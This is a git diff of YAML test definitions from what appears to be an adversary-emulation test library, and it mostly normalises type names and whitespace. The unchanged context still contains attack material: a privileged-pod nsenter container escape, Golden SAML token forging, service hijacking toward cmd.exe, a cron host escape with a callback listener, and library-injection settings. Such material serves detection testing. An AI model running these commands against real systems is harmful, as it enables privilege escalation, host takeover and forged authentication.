if [ -f #{path_to_shared_library} ]; then exit 0; else exit 1; fi; - get_prereq_command: | + get_prereq_command: | gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} executor: command: | @@ -44,11 +44,11 @@ atomic_tests: input_arguments: path_to_shared_library_source: description: Path to a shared library source code - type: Path + type: path default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c path_to_shared_library: description: Path to a shared library object - type: Path + type: path default: /tmp/T1574006.so dependency_executor_name: bash dependencies: @@ -71,15 +71,15 @@ atomic_tests: input_arguments: file_to_inject: description: Path of executable to be injected. Mostly works on non-apple default apps. - type: Path + type: path default: /Applications/Firefox.app/Contents/MacOS/firefox source_file: description: Path of c source file - type: Path + type: path default: PathToAtomicsFolder/T1574.006/src/MacOS/T1574.006.c dylib_file: description: Path of dylib file - type: Path + type: path default: /tmp/T1574006MOS.dylib dependency_executor_name: bash dependencies: diff --git a/atomics/T1574.008/T1574.008.yaml b/atomics/T1574.008/T1574.008.yaml index e45f6b49..f011b95d 100644 --- a/atomics/T1574.008/T1574.008.yaml +++ b/atomics/T1574.008/T1574.008.yaml @@ -16,4 +16,4 @@ atomic_tests: cleanup_command: | Remove-Item "$env:localappdata\Microsoft\WindowsApps\Get-Variable.exe" -ErrorAction Ignore Stop-Process -Name "calculator" - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1574.009/T1574.009.yaml b/atomics/T1574.009/T1574.009.yaml index 9af496da..d2372f38 100644 --- a/atomics/T1574.009/T1574.009.yaml +++ b/atomics/T1574.009/T1574.009.yaml @@ -12,7 +12,7 @@ atomic_tests: input_arguments: service_executable: description: Path of the executable used for the service and as the hijacked program.exe - type: Path + type: path default: PathToAtomicsFolder\T1574.009\bin\WindowsServiceExample.exe executor: command: | diff --git a/atomics/T1574.011/T1574.011.yaml b/atomics/T1574.011/T1574.011.yaml index 2d13e804..24c3eee6 100644 --- a/atomics/T1574.011/T1574.011.yaml +++ b/atomics/T1574.011/T1574.011.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: weak_service_name: description: weak service check - type: String + type: string default: weakservicename executor: command: | @@ -27,15 +27,15 @@ atomic_tests: input_arguments: weak_service_name: description: weak service name - type: String + type: string default: calcservice weak_service_path: description: weak service path - type: String + type: string default: '%windir%\system32\win32calc.exe' malicious_service_path: description: malicious service path - type: String + type: string default: '%windir%\system32\cmd.exe' dependency_executor_name: powershell dependencies: diff --git a/atomics/T1574.012/T1574.012.yaml b/atomics/T1574.012/T1574.012.yaml index eee257f7..d89e0172 100644 --- a/atomics/T1574.012/T1574.012.yaml +++ b/atomics/T1574.012/T1574.012.yaml @@ -16,11 +16,11 @@ atomic_tests: input_arguments: file_name: description: unmanaged profiler DLL - type: Path + type: path default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll clsid_guid: description: custom clsid guid - type: String + type: string default: '{09108e71-974c-4010-89cb-acf471ae9e2c}' dependency_executor_name: powershell dependencies: @@ -60,11 +60,11 @@ atomic_tests: input_arguments: file_name: description: unmanaged profiler DLL - type: Path + type: path default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll clsid_guid: description: custom clsid guid - type: String + type: string default: '{09108e71-974c-4010-89cb-acf471ae9e2c}' dependency_executor_name: powershell dependencies: @@ -98,11 +98,11 @@ atomic_tests: input_arguments: file_name: description: unamanged profiler DLL - type: Path + type: path default: PathToAtomicsFolder\T1574.012\bin\T1574.012x64.dll clsid_guid: description: custom clsid guid - type: String + type: string default: '{09108e71-974c-4010-89cb-acf471ae9e2c}' dependency_executor_name: powershell dependencies: @@ -123,4 +123,4 @@ atomic_tests: $env:COR_ENABLE_PROFILING = 0 $env:COR_PROFILER = '' $env:COR_PROFILER_PATH = '' - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1606.002/T1606.002.yaml b/atomics/T1606.002/T1606.002.yaml index cf94b9cd..948acc07 100644 --- a/atomics/T1606.002/T1606.002.yaml +++ b/atomics/T1606.002/T1606.002.yaml @@ -12,15 +12,15 @@ atomic_tests: input_arguments: certificate_path: description: Token signing certificate path. See T1552.004 to export it - type: Path + type: path default: '.\ADFS_signing.pfx' immutable_id: description: ImmutableId of the targeted user. It can be obtained with AzureAD powershell module; $(Get-AzureADUser -SearchString "username").ImmutableId - type: String + type: string default: "aehgdqBTZV50DKQZmNJ8mg==" issuer_uri: description: Issuer URI of the ADFS service - type: String + type: string default: "http://contoso.com/adfs/services/trust/" dependency_executor_name: powershell dependencies: @@ -38,4 +38,3 @@ atomic_tests: if ($conn) { Write-Host "`nSuccessfully connected as $($conn.User)" } else { Write-Host "`nThe connection failed" } Write-Host "End of Golden SAML" name: powershell - diff --git a/atomics/T1609/T1609.yaml b/atomics/T1609/T1609.yaml index 297d33c2..ddb32441 100644 --- a/atomics/T1609/T1609.yaml +++ b/atomics/T1609/T1609.yaml @@ -10,11 +10,11 @@ atomic_tests: input_arguments: namespace: description: K8s namespace to use - type: String + type: string default: default command: description: Command to run - type: String + type: string default: uname dependencies: - description: | @@ -37,11 +37,11 @@ atomic_tests: Attackers who have permissions, can run malicious commands in containers in the cluster using exec command (“docker exec”). In this method, attackers can use legitimate images, such as an OS image (e.g., Ubuntu) as a backdoor container, and run their malicious code remotely by using “docker exec”. Kinsing (Golang-based malware) was executed with an Ubuntu container entry point that runs shell scripts. supported_platforms: - - containers + - containers input_arguments: command: description: Command to run - type: String + type: string default: cat dependencies: - description: | @@ -60,4 +60,3 @@ atomic_tests: docker rmi -f t1609:latest name: bash elevation_required: false - diff --git a/atomics/T1611/T1611.yaml b/atomics/T1611/T1611.yaml index 764b9621..45fd52fd 100644 --- a/atomics/T1611/T1611.yaml +++ b/atomics/T1611/T1611.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1611 display_name: "Escape to Host" @@ -13,21 +12,21 @@ atomic_tests: - https://securekubernetes.com/scenario_2_attack/ supported_platforms: - containers - + dependency_executor_name: sh - dependencies: + dependencies: - description: Verify docker is installed. prereq_command: | which docker get_prereq_command: | if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi - + - description: Verify docker service is running. prereq_command: | sudo systemctl status docker get_prereq_command: | sudo systemctl start docker - + - description: Verify kind is in the path. prereq_command: | which kind @@ -35,13 +34,13 @@ atomic_tests: curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64 chmod +x ./kind mv kind /usr/bin/kind - + - description: Verify kind-atomic-cluster is created prereq_command: | sudo kind get clusters get_prereq_command: | sudo kind create cluster --name atomic-cluster - + - description: Verify kubectl is in path prereq_command: | which kubectl @@ -49,7 +48,7 @@ atomic_tests: curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl" chmod +x ./kubectl mv kubectl /usr/bin/kubectl - + executor: command: | kubectl --context kind-atomic-cluster run atomic-nsenter-escape-pod --restart=Never -ti --rm --image alpine --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' @@ -69,32 +68,32 @@ atomic_tests: input_arguments: mount_device: description: Path to the device of the host's disk to mount - type: Path + type: path default: /dev/dm-0 mount_point: description: Path where the host filesystem will be mounted - type: Path + type: path default: /mnt/T1611.002 cron_path: description: Path on the host filesystem where cron jobs are stored - type: Path + type: path default: /etc/cron.d cron_filename: description: Filename of the cron job in cron_path - type: String + type: string default: T1611_002 listen_address: description: IP address to listen for callback from the host system. - type: String + type: string default: "`ifconfig eth0 | grep inet | awk '{print $2}'`" listen_port: description: TCP Port to listen on for callback from the host system. - type: String + type: string default: 4444 dependency_executor_name: sh diff --git a/atomics/T1615/T1615.yaml b/atomics/T1615/T1615.yaml index 189c43a0..e3e5b535 100644 --- a/atomics/T1615/T1615.yaml +++ b/atomics/T1615/T1615.yaml @@ -10,7 +10,7 @@ atomic_tests: https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/ Turla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf supported_platforms: - - windows + - windows executor: name: command_prompt elevation_required: false @@ -56,7 +56,7 @@ atomic_tests: input_arguments: gpo_output: description: The output of the Get-GPO cmdlet - type: String + type: string default: $env:temp\GPO_Output.txt gpo_param: description: You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter